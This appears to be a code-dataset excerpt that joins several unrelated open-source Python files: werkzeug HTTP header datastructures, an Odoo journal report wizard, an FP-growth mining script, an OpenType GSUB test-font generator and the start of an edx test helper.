if is_byte_range_valid(start, end, length):
return start, min(end, length)
def make_content_range(self, length):
"""Creates a :class:`~werkzeug.datastructures.ContentRange` object
from the current range and given content length.
"""
rng = self.range_for_length(length)
if rng is not None:
return ContentRange(self.units, rng[0], rng[1], length)
def to_header(self):
"""Converts the object back into an HTTP header."""
ranges = []
for begin, end in self.ranges:
if end is None:
ranges.append(begin >= 0 and '%s-' % begin or str(begin))
else:
ranges.append('%s-%s' % (begin, end - 1))
return '%s=%s' % (self.units, ','.join(ranges))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
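# Minimal sketch (an assumption, not part of the original module): how
# range_for_length() resolves a parsed Range header against a known content
# length; remember the stored ranges are non-inclusive (begin, end) tuples.
#
#     rng = Range('bytes', [(0, 500)])
#     rng.range_for_length(1000)            # (0, 500)
#     rng = Range('bytes', [(-500, None)])  # "bytes=-500" -> last 500 bytes
#     rng.range_for_length(1000)            # (500, 1000)
#     rng.to_header()                       # 'bytes=-500'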
class ContentRange(object):
"""Represents the content range header.
.. versionadded:: 0.7
"""
def __init__(self, units, start, stop, length=None, on_update=None):
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self.on_update = on_update
self.set(start, stop, length, units)
def _callback_property(name):
def fget(self):
return getattr(self, name)
def fset(self, value):
setattr(self, name, value)
if self.on_update is not None:
self.on_update(self)
return property(fget, fset)
#: The units to use, usually "bytes"
units = _callback_property('_units')
#: The start point of the range or `None`.
start = _callback_property('_start')
#: The stop point of the range (non-inclusive) or `None`. Can only be
#: `None` if also start is `None`.
stop = _callback_property('_stop')
#: The length of the range or `None`.
length = _callback_property('_length')
def set(self, start, stop, length=None, units='bytes'):
"""Simple method to update the ranges."""
assert is_byte_range_valid(start, stop, length), \
'Bad range provided'
self._units = units
self._start = start
self._stop = stop
self._length = length
if self.on_update is not None:
self.on_update(self)
def unset(self):
"""Sets the units to `None` which indicates that the header should
no longer be used.
"""
self.set(None, None, units=None)
def to_header(self):
if self.units is None:
return ''
if self.length is None:
length = '*'
else:
length = self.length
if self.start is None:
return '%s */%s' % (self.units, length)
return '%s %s-%s/%s' % (
self.units,
self.start,
self.stop - 1,
length
)
def __nonzero__(self):
return self.units is not None
__bool__ = __nonzero__
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
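# Minimal sketch (assumption, not from the original source): a ContentRange is
# usually produced from a Range via make_content_range(), e.g.
#
#     rng = Range('bytes', [(0, 500)])
#     cr = rng.make_content_range(1000)
#     cr.to_header()   # 'bytes 0-499/1000'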
class Authorization(ImmutableDictMixin, dict):
"""Represents an `Authorization` header sent by the client. You should
not create this kind of object yourself but use it when it's returned by
the `parse_authorization_header` function.
This object is a dict subclass and can be altered by setting dict items
but it should be considered immutable as it's returned by the client and
not meant for modifications.
.. versionchanged:: 0.5
This object became immutable.
"""
def __init__(self, auth_type, data=None):
dict.__init__(self, data or {})
self.type = auth_type
username = property(lambda x: x.get('username'), doc='''
The username transmitted. This is set for both basic and digest
auth all the time.''')
password = property(lambda x: x.get('password'), doc='''
When the authentication type is basic this is the password
transmitted by the client, else `None`.''')
realm = property(lambda x: x.get('realm'), doc='''
This is the server realm sent back for HTTP digest auth.''')
nonce = property(lambda x: x.get('nonce'), doc='''
The nonce the server sent for digest auth, sent back by the client.
A nonce should be unique for every 401 response for HTTP digest
auth.''')
uri = property(lambda x: x.get('uri'), doc='''
The URI from Request-URI of the Request-Line; duplicated because
proxies are allowed to change the Request-Line in transit. HTTP
digest auth only.''')
nc = property(lambda x: x.get('nc'), doc='''
The nonce count value transmitted by clients if a qop-header is
also transmitted. HTTP digest auth only.''')
cnonce = property(lambda x: x.get('cnonce'), doc='''
If the server sent a qop-header in the ``WWW-Authenticate``
header, the client has to provide this value for HTTP digest auth.
See the RFC for more details.''')
response = property(lambda x: x.get('response'), doc='''
A string of 32 hex digits computed as defined in RFC 2617, which
proves that the user knows a password. Digest auth only.''')
opaque = property(lambda x: x.get('opaque'), doc='''
The opaque header from the server returned unchanged by the client.
It is recommended that this string be base64 or hexadecimal data.
Digest auth only.''')
@property
def qop(self):
"""Indicates what "quality of protection" the client has applied to
the message for HTTP digest auth."""
def on_update(header_set):
if not header_set and 'qop' in self:
del self['qop']
elif header_set:
self['qop'] = header_set.to_header()
return parse_set_header(self.get('qop'), on_update)
class WWWAuthenticate(UpdateDictMixin, dict):
"""Provides simple access to `WWW-Authenticate` headers."""
#: list of keys that require quoting in the generated header
_require_quoting = frozenset(['domain', 'nonce', 'opaque', 'realm'])
def __init__(self, auth_type=None, values=None, on_update=None):
dict.__init__(self, values or ())
if auth_type:
self['__auth_type__'] = auth_type
self.on_update = on_update
def set_basic(self, realm='authentication required'):
"""Clear the auth info and enable basic auth."""
dict.clear(self)
dict.update(self, {'__auth_type__': 'basic', 'realm': realm})
if self.on_update:
self.on_update(self)
def set_digest(self, realm, nonce, qop=('auth',), opaque=None,
algorithm=None, stale=False):
"""Clear the auth info and enable digest auth."""
d = {
'__auth_type__': 'digest',
'realm': realm,
'nonce': nonce,
'qop': dump_header(qop)
}
if stale:
d['stale'] = 'TRUE'
if opaque is not None:
d['opaque'] = opaque
if algorithm is not None:
d['algorithm'] = algorithm
dict.clear(self)
dict.update(self, d)
if self.on_update:
self.on_update(self)
def to_header(self):
"""Convert the stored values into a WWW-Authenticate header."""
d = dict(self)
auth_type = d.pop('__auth_type__', None) or 'basic'
return '%s %s' % (auth_type.title(), ', '.join([
'%s=%s' % (key, quote_header_value(value,
allow_token=key not in self._require_quoting))
for key, value in iteritems(d)
]))
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
def auth_property(name, doc=None):
"""A static helper function for subclasses to add extra authentication
system properties onto a class::
class FooAuthenticate(WWWAuthenticate):
special_realm = auth_property('special_realm')
For more information have a look at the sourcecode to see how the
regular properties (:attr:`realm` etc.) are implemented.
"""
def _set_value(self, value):
if value is None:
self.pop(name, None)
else:
self[name] = str(value)
return property(lambda x: x.get(name), _set_value, doc=doc)
def _set_property(name, doc=None):
def fget(self):
def on_update(header_set):
if not header_set and name in self:
del self[name]
elif header_set:
self[name] = header_set.to_header()
return parse_set_header(self.get(name), on_update)
return property(fget, doc=doc)
type = auth_property('__auth_type__', doc='''
The type of the auth mechanism. HTTP currently specifies
`Basic` and `Digest`.''')
realm = auth_property('realm', doc='''
A string to be displayed to users so they know which username and
password to use. This string should contain at least the name of
the host performing the authentication and might additionally
indicate the collection of users who might have access.''')
domain = _set_property('domain', doc='''
A list of URIs that define the protection space. If a URI is an
absolute path, it is relative to the canonical root URL of the
server being accessed.''')
nonce = auth_property('nonce', doc='''
A server-specified data string which should be uniquely generated
each time a 401 response is made. It is recommended that this
string be base64 or hexadecimal data.''')
opaque = auth_property('opaque', doc='''
A string of data, specified by the server, which should be returned
by the client unchanged in the Authorization header of subsequent
requests with URIs in the same protection space. It is recommended
that this string be base64 or hexadecimal data.''')
algorithm = auth_property('algorithm', doc='''
A string indicating a pair of algorithms used to produce the digest
and a checksum. If this is not present it is assumed to be "MD5".
If the algorithm is not understood, the challenge should be ignored
(and a different one used, if there is more than one).''')
qop = _set_property('qop', doc='''
A set of quality-of-privacy directives such as auth and auth-int.''')
def _get_stale(self):
val = self.get('stale')
if val is not None:
return val.lower() == 'true'
def _set_stale(self, value):
if value is None:
self.pop('stale', None)
else:
self['stale'] = value and 'TRUE' or 'FALSE'
stale = property(_get_stale, _set_stale, doc='''
A flag, indicating that the previous request from the client was
rejected because the nonce value was stale.''')
del _get_stale, _set_stale
# make auth_property a staticmethod so that subclasses of
# `WWWAuthenticate` can use it for new properties.
auth_property = staticmethod(auth_property)
del _set_property
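# Hedged usage sketch (not part of the original module): building a challenge
# header for a 401 response with the class above, e.g.
#
#     www_auth = WWWAuthenticate()
#     www_auth.set_basic(realm='login required')
#     www_auth.to_header()   # 'Basic realm="login required"'
#
# set_digest() works the same way but also takes nonce/qop/opaque values.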
class FileStorage(object):
"""The :class:`FileStorage` class is a thin wrapper over incoming files.
It is used by the request object to represent uploaded files. All the
attributes of the wrapper stream are proxied by the file storage so
it's possible to do ``storage.read()`` instead of the long form
``storage.stream.read()``.
"""
def __init__(self, stream=None, filename=None, name=None,
content_type=None, content_length=None,
headers=None):
self.name = name
self.stream = stream or _empty_stream
# if no filename is provided we can attempt to get the filename
# from the stream object passed. There we have to be careful to
# skip things like <fdopen>, <stderr> etc. Python marks these
# special filenames with angular brackets.
if filename is None:
filename = getattr(stream, 'name', None)
s = make_literal_wrapper(filename)
if filename and filename[0] == s('<') and filename[-1] == s('>'):
filename = None
# On Python 3 we want to make sure the filename is always unicode.
# This might not be if the name attribute is bytes due to the
# file being opened from the bytes API.
if not PY2 and isinstance(filename, bytes):
filename = filename.decode(sys.getfilesystemencoding(),
'replace')
self.filename = filename
if headers is None:
headers = Headers()
self.headers = headers
if content_type is not None:
headers['Content-Type'] = content_type
if content_length is not None:
headers['Content-Length'] = str(content_length)
def _parse_content_type(self):
if not hasattr(self, '_parsed_content_type'):
self._parsed_content_type = \
parse_options_header(self.content_type)
@property
def content_type(self):
"""The content-type sent in the header. Usually not available"""
return self.headers.get('content-type')
@property
def content_length(self):
"""The content-length sent in the header. Usually not available"""
return int(self.headers.get('content-length') or 0)
@property
def mimetype(self):
"""Like :attr:`content_type` but without parameters (eg, without
charset, type etc.). For example if the content
type is ``text/html; charset=utf-8`` the mimetype would be
``'text/html'``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[0]
@property
def mimetype_params(self):
"""The mimetype parameters as dict. For example if the content
type is ``text/html; charset=utf-8`` the params would be
``{'charset': 'utf-8'}``.
.. versionadded:: 0.7
"""
self._parse_content_type()
return self._parsed_content_type[1]
def save(self, dst, buffer_size=16384):
"""Save the file to a destination path or file object. If the
destination is a file object you have to close it yourself after the
call. The buffer size is the number of bytes held in memory during
the copy process. It defaults to 16KB.
For secure file saving also have a look at :func:`secure_filename`.
:param dst: a filename or open file object the uploaded file
is saved to.
:param buffer_size: the size of the buffer. This works the same as
the `length` parameter of
:func:`shutil.copyfileobj`.
"""
from shutil import copyfileobj
close_dst = False
if isinstance(dst, string_types):
dst = open(dst, 'wb')
close_dst = True
try:
copyfileobj(self.stream, dst, buffer_size)
finally:
if close_dst:
dst.close()
def close(self):
"""Close the underlying file if possible."""
try:
self.stream.close()
except Exception:
pass
def __nonzero__(self):
return bool(self.filename)
def __getattr__(self, name):
return getattr(self.stream, name)
def __iter__(self):
return iter(self.readline, '')
def __repr__(self):
return '<%s: %r (%r)>' % (
self.__class__.__name__,
self.filename,
self.content_type
)
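# Illustrative sketch (an assumption, not from the original source): in a
# werkzeug request the ``files`` mapping holds FileStorage objects, e.g.
#
#     fs = request.files['upload']   # a FileStorage instance
#     fs.filename                    # client-supplied name (may be None)
#     fs.save('/tmp/upload.bin')     # stream copied with shutil.copyfileobj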
# circular dependencies
from werkzeug.http import dump_options_header, dump_header, generate_etag, \
quote_header_value, parse_set_header, unquote_etag, quote_etag, \
parse_options_header, http_date, is_byte_range_valid
from werkzeug import exceptions
| apache-2.0 |
alexcuellar/odoo | addons/account/wizard/account_report_central_journal.py | 378 | 1697 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_central_journal(osv.osv_memory):
_name = 'account.central.journal'
_description = 'Account Central Journal'
_inherit = "account.common.journal.report"
_columns = {
'journal_ids': fields.many2many('account.journal', 'account_central_journal_journal_rel', 'account_id', 'journal_id', 'Journals', required=True),
}
def _print_report(self, cr, uid, ids, data, context=None):
data = self.pre_print_report(cr, uid, ids, data, context=context)
return self.pool['report'].get_action(cr, uid, [], 'account.report_centraljournal', data=data, context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
freestyle4568/Clothes-match | feature_analysis/src/fp_growth.py | 1 | 6357 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Created on Sep 20, 2015
@author: freestyle4568
'''
"""
this progarm is to test fp-growth algorithm
user guide: result_list, support_data_dict = fptree(dataset, min_support)
该函数返回列表格式的result_list, 元素为列表, [[1元素项集], [2元素项集]]
子列表元素为固定集合 -- frozenset({, , ,})
support_data_dict为字典格式,元素为(frozenset({}): number)
"""
from operator import itemgetter
class TreeNode:
def __init__(self, name_value, num_occur, parent_node):
self.name = name_value
self.count = num_occur
self.nodelink = None
self.parent = parent_node
self.children = {}
def inc(self, num_occur):
self.count += num_occur
def disp(self, index=1):
print(' '*index, self.name, ' ', self.count)
for child in self.children.values():
child.disp(index+1)
return
def create_tree(dataset, min_support=1):
header_table = {}
for trans in dataset:
for item in trans:
header_table[item] = header_table.get(item, 0) + dataset[trans]
tmp_keys = list(header_table.keys())
for k in tmp_keys:
if header_table[k] < min_support:
header_table.pop(k)
#print("frist header_table is: ", header_table)
freqitem_set = set(header_table.keys())
if len(freqitem_set) == 0:
#raise RuntimeError('no freqitems satisfy this min_support')
return None, None
for k in header_table:
header_table[k] = [header_table[k], None]
result_tree = TreeNode('NullNode', 1, None)
for transaction, count in dataset.items():
local_data = {}
for item in transaction:
if item in freqitem_set:
local_data[item] = header_table[item][0]
if len(local_data) > 0:
ordered_items = [v[0] for v in sorted(local_data.items(),
key = itemgetter(1, 0), reverse = True)]
update_tree(ordered_items, result_tree, header_table, count)
return result_tree, header_table
def update_tree(items, tree, header_table, count):
if items[0] in tree.children:
tree.children[items[0]].inc(count)
else:
tree.children[items[0]] = TreeNode(items[0], count, tree)
if header_table[items[0]][1] == None:
header_table[items[0]][1] = tree.children[items[0]]
else:
update_header(header_table[items[0]][1],
tree.children[items[0]])
if len(items) > 1:
update_tree(items[1:], tree.children[items[0]], header_table, count)
return
def update_header(node_to_test, target_node):
while (node_to_test.nodelink != None):
node_to_test = node_to_test.nodelink
node_to_test.nodelink = target_node
return
def load_simple_data():
simple_data = [['r', 'z', 'h', 'j', 'p'],
['z', 'y', 'x', 'w', 'v', 'u', 't', 's'],
['z'],
['r', 'x', 'n', 'o', 's'],
['y', 'r', 'x', 'z', 'q', 't', 'p'],
['y', 'z', 'x', 'e', 'q', 's', 't', 'm']
]
return simple_data
def create_init_set(dataset):
result_dict = {}
for d in dataset:
result_dict[frozenset(d)] = 1
return result_dict
def ascend_tree(leaf_node, prefix_path):
if leaf_node.parent != None:
prefix_path.append(leaf_node.name)
ascend_tree(leaf_node.parent, prefix_path)
return
def find_prefix_path(tree_node):
condition_path = {}
while tree_node != None:
prefix_path = []
ascend_tree(tree_node, prefix_path)
if len(prefix_path) > 1:
condition_path[frozenset(prefix_path[1:])] = tree_node.count
tree_node = tree_node.nodelink
return condition_path
def mine_tree(tree, header_table, min_support, prefix, freqitem_list, support_list):
big_list = [v[0] for v in sorted(header_table.items(), key = lambda p: p[1][0])]
for base in big_list:
new_freq_set = prefix.copy()
new_freq_set.add(base)
freqitem_list.append(new_freq_set)
#print(new_freq_set)
support_list.append(header_table[base][0])
condition_path = find_prefix_path(header_table[base][1])
condition_tree, condition_header_table = create_tree(condition_path, min_support)
if condition_header_table != None:
mine_tree(condition_tree, condition_header_table, min_support, new_freq_set, freqitem_list, support_list)
def resultlist2dict(freqitem_list, support_list):
result_list = []
len_result = len(freqitem_list)
support_data = {}
max_element_number = 0
for i in range(len_result):
support_data.update({frozenset(freqitem_list[i]): support_list[i]})
if max_element_number < len(freqitem_list[i]):
max_element_number = len(freqitem_list[i])
for k in range(max_element_number):
c = []
tmp_list = freqitem_list.copy()
for freqset in tmp_list:
if len(freqset) == k+1:
c.append(frozenset(freqset))
freqitem_list.remove(freqset)
result_list.append(c)
return result_list, support_data
def fptree(dataset, min_support):
data_len = len(dataset)
dataset_dict = create_init_set(dataset)
FPtree, header_table = create_tree(dataset_dict, min_support)
freqitem_list = []
support_list = []
mine_tree(FPtree, header_table, min_support, set([]), freqitem_list, support_list)
result_list, support_data = resultlist2dict(freqitem_list, support_list)
for i in support_data:
support_data[i] = support_data[i]/data_len
return result_list, support_data
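# Minimal usage sketch (mirrors the guide in the module docstring):
#
#     dataset = load_simple_data()
#     freq_itemsets, support = fptree(dataset, min_support=3)
#     # freq_itemsets[0] -> frequent 1-item frozensets, freq_itemsets[1] -> 2-item, ...
#     # support maps each frozenset to its relative support (count / len(dataset))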
if __name__ == '__main__':
filename = '/home/freestyle4568/lesson/Clothes-match-txt/user_catset.txt'
fr = open(filename)
dataset = []
for line in fr.readlines():
catset = line.split()[1]
dataset.append(catset.split(','))
for i in range(10):
print(dataset[i])
dataset = load_simple_data()
result_list, support_data = fptree(dataset, 3)
for i in result_list:
print(i)
print(len(support_data))
for j in support_data.items():
print(j)
| apache-2.0 |
rixrix/servo | tests/wpt/css-tests/css-fonts-3_dev/xhtml1/reference/support/fonts/makegsubfonts.py | 820 | 14309 |
import os
import textwrap
from xml.etree import ElementTree
from fontTools.ttLib import TTFont, newTable
from fontTools.misc.psCharStrings import T2CharString
from fontTools.ttLib.tables.otTables import GSUB,\
ScriptList, ScriptRecord, Script, DefaultLangSys,\
FeatureList, FeatureRecord, Feature,\
LookupList, Lookup, AlternateSubst, SingleSubst
# paths
directory = os.path.dirname(__file__)
shellSourcePath = os.path.join(directory, "gsubtest-shell.ttx")
shellTempPath = os.path.join(directory, "gsubtest-shell.otf")
featureList = os.path.join(directory, "gsubtest-features.txt")
javascriptData = os.path.join(directory, "gsubtest-features.js")
outputPath = os.path.join(os.path.dirname(directory), "gsubtest-lookup%d")
baseCodepoint = 0xe000
# -------
# Features
# -------
f = open(featureList, "rb")
text = f.read()
f.close()
mapping = []
for line in text.splitlines():
line = line.strip()
if not line:
continue
if line.startswith("#"):
continue
# parse
values = line.split("\t")
tag = values.pop(0)
mapping.append(tag);
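# Note (editorial assumption about the data file): gsubtest-features.txt is
# expected to be a tab-separated list with the OpenType feature tag in the
# first column, e.g.
#
#     aalt	Access All Alternates
#
# Only the tag column is kept in `mapping`; blank lines and lines starting
# with "#" are skipped by the loop above.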
# --------
# Outlines
# --------
def addGlyphToCFF(glyphName=None, program=None, private=None, globalSubrs=None, charStringsIndex=None, topDict=None, charStrings=None):
charString = T2CharString(program=program, private=private, globalSubrs=globalSubrs)
charStringsIndex.append(charString)
glyphID = len(topDict.charset)
charStrings.charStrings[glyphName] = glyphID
topDict.charset.append(glyphName)
def makeLookup1():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup1")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
# bump this up so that the sequence is the same as the lookup 3 font
cp += 3
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 1
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = SingleSubst()
subtable.Format = 2
subtable.LookupType = 1
subtable.mapping = {
"%s.pass" % tag : "%s.fail" % tag,
"%s.fail" % tag : "%s.pass" % tag,
}
lookup.SubTable.append(subtable)
path = outputPath % 1 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeLookup3():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup3")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
# tag.default
glyphName = "%s.default" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.alt1,2,3
for i in range(1,4):
glyphName = "%s.alt%d" % (tag, i)
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 3
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = AlternateSubst()
subtable.Format = 1
subtable.LookupType = 3
subtable.alternates = {
"%s.default" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt1" % tag : ["%s.pass" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt2" % tag : ["%s.fail" % tag, "%s.pass" % tag, "%s.fail" % tag],
"%s.alt3" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.pass" % tag]
}
lookup.SubTable.append(subtable)
path = outputPath % 3 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeJavascriptData():
features = sorted(mapping)
outStr = []
outStr.append("")
outStr.append("/* This file is autogenerated by makegsubfonts.py */")
outStr.append("")
outStr.append("/* ")
outStr.append(" Features defined in gsubtest fonts with associated base")
outStr.append(" codepoints for each feature:")
outStr.append("")
outStr.append(" cp = codepoint for feature featX")
outStr.append("")
outStr.append(" cp default PASS")
outStr.append(" cp featX=1 FAIL")
outStr.append(" cp featX=2 FAIL")
outStr.append("")
outStr.append(" cp+1 default FAIL")
outStr.append(" cp+1 featX=1 PASS")
outStr.append(" cp+1 featX=2 FAIL")
outStr.append("")
outStr.append(" cp+2 default FAIL")
outStr.append(" cp+2 featX=1 FAIL")
outStr.append(" cp+2 featX=2 PASS")
outStr.append("")
outStr.append("*/")
outStr.append("")
outStr.append("var gFeatures = {");
cp = baseCodepoint
taglist = []
for tag in features:
taglist.append("\"%s\": 0x%x" % (tag, cp))
cp += 4
outStr.append(textwrap.fill(", ".join(taglist), initial_indent=" ", subsequent_indent=" "))
outStr.append("};");
outStr.append("");
if os.path.exists(javascriptData):
os.remove(javascriptData)
f = open(javascriptData, "wb")
f.write("\n".join(outStr))
f.close()
# build fonts
print "Making lookup type 1 font..."
makeLookup1()
print "Making lookup type 3 font..."
makeLookup3()
# output javascript data
print "Making javascript data file..."
makeJavascriptData() | mpl-2.0 |
analyseuc3m/ANALYSE-v1 | cms/djangoapps/contentstore/features/common.py | 60 | 12732 | # pylint: disable=missing-docstring
# pylint: disable=redefined-outer-name
import os
from lettuce import world, step
from nose.tools import assert_true, assert_in
from django.conf import settings
from student.roles import CourseStaffRole, CourseInstructorRole, GlobalStaff
from student.models import get_user
from selenium.webdriver.common.keys import Keys
